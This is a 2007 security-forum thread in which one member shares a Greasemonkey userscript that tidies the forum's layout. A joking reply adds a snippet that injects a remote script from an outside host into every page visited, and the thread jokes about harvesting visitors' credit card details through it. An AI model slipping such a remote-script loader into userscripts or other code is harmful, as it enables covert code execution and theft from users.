Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
PM Stuff and hack credo.
Posted by: jungsonn
Date: February 10, 2007 04:55PM

Hey guys, sorry to say but I'll get alot of questions through a PM to hack sites etcetera.. I want to say to the people who send me this: Post it in the forum. I don't have time to look and reply to each PM send to me, and I won't hack stuff other then for myself, which is rare also. I'm into security and my goal is to fix things rather then to break stuff - end of credo ^^

BTW is there a way to turn PM's off RSnake?

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: rsnake
Date: February 12, 2007 03:15PM

Hmm... I don't think there is a way to turn them off, no, I'm sorry, Jungsonn... but you can always write a greasemonkey script to ignore the button so you don't know you're getting them ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: Kyran
Date: February 12, 2007 03:20PM

Speaking of blocking, could you toss the header stuff into a div with a unique id attribute? I want to remove the 'Sla.ckers' part as well as the links on the top right, but I'm too lazy to remove them in other ways.

- Kyran

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: WhiteAcid
Date: February 12, 2007 03:38PM

// ==UserScript==
// @name			Sla.ckers.org cleanup
// @description	Why not remove the useless bits from the forum and make it a little easier to use?
// @include		http://sla.ckers.org/forum/*
// ==/UserScript==

// Remove the logo
imgs = document.getElementsByTagName('img')
for (i=0; i<imgs.length; i++)
{
	if (imgs.src == 'http://sla.ckers.org/forum/templates/default/images/logo.png')
	{
		imgs.setAttribute('style','display:none')
		break;
	}
}

divs = document.getElementsByTagName('div')
for (i=0; i<divs.length; i++)
{
	// Remove the Footer
	if (divs.className == 'footer')
	{
		divs.setAttribute('style','display:none')
		break; // We can break here as the footer is always at the end
	}
	
	// Properly highlight "new" posts when on the /read.php?* page
	if (divs.className == 'ReadBodyHead' && divs.innerHTML.search('<span class="NewFlag">new</span>') > 0)
	{
		divs.setAttribute('style','background-color: #faa')
	}
}

// Properly highlight "new" posts
tds = document.getElementsByTagName('td')
for (i=0; i<tds.length; i++)
{
	// If were's on a /list.php?* page
	if ((tds.className == 'TableRow' || tds.className == 'TableRowAlt') && tds.innerHTML.search('<span class="NewFlag">new</span>') > 0)
	{
		tds.setAttribute('style','background-color: #faa')
		// Oh noes, ugly code alert!!
		tds.nextSibling.nextSibling.setAttribute('style','background-color: #faa')
		tds.nextSibling.nextSibling.nextSibling.nextSibling.setAttribute('style','background-color: #faa')
		tds.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.setAttribute('style','background-color: #faa')
		tds.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.nextSibling.setAttribute('style','background-color: #faa')
	}
	//And now if we're on the main page
	else if (tds.className == 'forum-posts' && tds.innerHTML.search('<span class="NewFlag">') > 0)
	{
		tds.setAttribute('style','background-color: #faa')
		// Oh noes, ugly code alert!!
		tds.nextSibling.nextSibling.setAttribute('style','background-color: #faa')
		tds.previousSibling.previousSibling.setAttribute('style','background-color: #faa')
		tds.previousSibling.previousSibling.previousSibling.previousSibling.setAttribute('style','background-color: #faa')
	}
	//This does leave the "new" text, but that gets cleaned up later as we loop through span tags
}

spans = document.getElementsByTagName('span')
//Remove the top-right links
spans[0].setAttribute('style','display:none')
// Remove the "new" text by threads with new posts in them.
for (i=0; i<spans.length; i++)
{
	if (spans.className == 'NewFlag')
	{
		spans.setAttribute('style','display:none')
	}
}

I realise the code is a mess but suggestions are welcome.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 4 time(s). Last edit at 02/12/2007 05:39PM by WhiteAcid.

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: jungsonn
Date: February 12, 2007 05:32PM

omg what's a greasemonkey? yeah sorry i'm not that hip! ;)

wow WhiteAcid... alot of time on your hands
is this script supposed to go into a greasemonkey?

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: WhiteAcid
Date: February 12, 2007 05:36PM

Quote
http://greasemonkey.mozdev.org/
Greasemonkey is a Firefox extension which lets you to add bits of DHTML ("user scripts") to any web page to change its behavior. In much the same way that user CSS lets you take control of a web page's style, user scripts let you easily control any aspect of a web page's design or interaction.

I just updated the above script, I'd missed an OR clause. Copy paste that code into slackers.user.js which you save onto your system. Then Open the file in firefox and the greasemonkey extension will ask you to install it. Do that. You're done, it's installed and running.

Oh, this forum changes the formatting of the @include parameter right at the top, set that back to http ://sla.ckers.org/forum/* before saving and installing the script. Of course, once installed you can delete the .user.js file.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 02/12/2007 05:37PM by WhiteAcid.

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: jungsonn
Date: February 13, 2007 02:41AM

Thanks man, I'll go download it.

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: rsnake
Date: February 13, 2007 01:20PM

Interesting code... can you please make it auto submit money into my PayPal account and float the banners under your mouse cursor while you're at it? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: WhiteAcid
Date: February 13, 2007 02:20PM

Sure. I'll implement that later into a .js file, for now just add this code to it:
s = document.createElement('script')
s.src = "http://www.whiteacid.org/give_money.js"
document.body.appendChild(s)

Also you'll need to change the @include thing to just plain old *. I'll create the .js file in the next 48 hours which gives you money, I swear :p

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: SW
Date: February 14, 2007 09:40AM

WhiteAcid Wrote:
-------------------------------------------------------
> tds.previousSibling.previousSibling.previousSibling.previousSibling.setAttribute(

Haha.


WhiteAcid Wrote:
-------------------------------------------------------
> Sure. I'll implement that later into a .js file,
> for now just add this code to it:
> s = document.createElement('script')
> s.src = "http://www.whiteacid.org/give_money.js"
> document.body.appendChild(s)
>
>
> Also you'll need to change the @include thing to
> just plain old *. I'll create the .js file in the
> next 48 hours which gives you money, I swear :p

Looooooool. You need to set your credit card info as variables in the greasemonkey script to make it work though right? :-p

Options: ReplyQuote
Re: PM Stuff and hack credo.
Posted by: WhiteAcid
Date: February 14, 2007 10:44AM

I told you the code was a mess, even the code says so:
// Oh noes, ugly code alert!!
Using nextSibling and previousSibling I access the other <td>s in the <tr> to highlight them too. I have to use nextSibling and previousSibling is two's because there's a text node between the two <td>s.

As for the .js file, I was planning to just run JS on every page you visit (mhtml vuln via greasemonkey :D), but if you shove your CC details in an array called CC_details that'd make things easier for me :).

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote


Sorry, only registered users may post in this forum.